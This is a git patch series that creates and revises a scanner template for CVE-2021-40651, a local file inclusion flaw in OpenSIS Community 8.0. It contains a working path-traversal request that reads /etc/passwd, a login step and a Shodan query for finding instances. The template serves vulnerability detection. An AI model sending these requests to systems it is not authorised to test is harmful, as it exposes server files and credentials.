From 701b3f4f8ac3c7454b6cdfd3083b7c95c6b8241e Mon Sep 17 00:00:00 2001 From: ctflearner <98345027+ctflearner@users.noreply.github.com> Date: Fri, 6 Oct 2023 10:14:43 +0530 Subject: [PATCH 1/3] Create CVE-2021-40651.yaml --- http/cves/2021/CVE-2021-40651.yaml | 36 ++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2021/CVE-2021-40651.yaml diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml new file mode 100644 index 0000000000..ad3500a00d --- /dev/null +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-40651 + +info: + name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion + author: ctflearner + severity: medium + description: OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-40651 + - https://www.exploit-db.com/exploits/50259 + - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md + - https://www.youtube.com/watch?v=wFwlbXANRCo + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-40651 + cwe-id: CWE-22 + cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* + tags: lfi,OS4Ed,OpenSIS + + +http: + - method: GET + path: + - "{{BaseURL}}/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 6452c15146b86e63f896079ced033781409e047a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 8 Oct 2023 13:03:15 +0530 Subject: [PATCH 2/3] Update CVE-2021-40651.yaml --- http/cves/2021/CVE-2021-40651.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index ad3500a00d..2885c8b27d 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -4,7 +4,8 @@ info: name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion author: ctflearner severity: medium - description: OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file. + description: | + OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-40651 - https://www.exploit-db.com/exploits/50259 @@ -16,15 +17,16 @@ info: cve-id: CVE-2021-40651 cwe-id: CWE-22 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* - tags: lfi,OS4Ed,OpenSIS - + metadata: + shodan-query: title:"openSIS" + max-request: 1 + tags: cve,cve2021,lfi,os4ed,opensis http: - method: GET path: - "{{BaseURL}}/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=" - - stop-at-first-match: true + matchers-condition: and matchers: - type: regex From 4fbf38e8e83c6e94313b503d5d685d7ae89a8088 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 5 Feb 2024 10:58:25 +0530 Subject: [PATCH 3/3] added login req --- http/cves/2021/CVE-2021-40651.yaml | 34 ++++++++++++++++++------------ 1 file changed, 20 insertions(+), 14 deletions(-) diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index 2885c8b27d..efa84bfed4 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -7,10 +7,10 @@ info: description: | OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-40651 - https://www.exploit-db.com/exploits/50259 - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md - https://www.youtube.com/watch?v=wFwlbXANRCo + - https://nvd.nist.gov/vuln/detail/CVE-2021-40651 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 @@ -18,21 +18,27 @@ info: cwe-id: CWE-22 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* metadata: - shodan-query: title:"openSIS" max-request: 1 - tags: cve,cve2021,lfi,os4ed,opensis + shodan-query: title:"openSIS" + tags: cve,cve2021,lfi,os4ed,opensis,authenticated http: - - method: GET - path: - - "{{BaseURL}}/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=" + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + + - | + GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1 + Host: {{Hostname}} - matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - 'contains(body_1, "openSIS")' + - "status_code == 200" + condition: and